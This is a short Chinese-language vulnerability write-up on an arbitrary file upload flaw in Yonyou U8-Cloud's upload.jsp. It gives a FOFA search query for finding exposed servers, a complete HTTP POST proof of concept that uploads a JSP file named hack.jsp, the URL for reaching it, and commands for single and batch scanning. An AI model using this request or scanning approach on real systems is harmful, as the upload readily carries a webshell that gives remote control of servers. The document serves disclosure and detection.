用友U8-Cloud upload.jsp任意文件上传漏洞

一、漏洞描述

U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。

该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器

二、网络空间搜索引擎搜索

fofa查询

app="用友-U8-Cloud"

三、漏洞复现

poc

POST /linux/pages/upload.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=F0344BD3C6761D7E4CFDDD76960710B1.server; JSESSIONID=297190CC38DE8614285AD7DC95102AFB.server
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
filename: hack.jsp
Content-Length: 56


<% out.println("The website has vulnerabilities!!");%>

访问

http://ip:port/linux/hack.jsp

四、漏洞检测

单个检测

python NC-CloudUploadCheck.py -u url

批量检测

python NC-CloudUploadCheck.py -f filename

关注微信公众号， 网络安全透视镜 回复 20231024 获取 批量检测脚本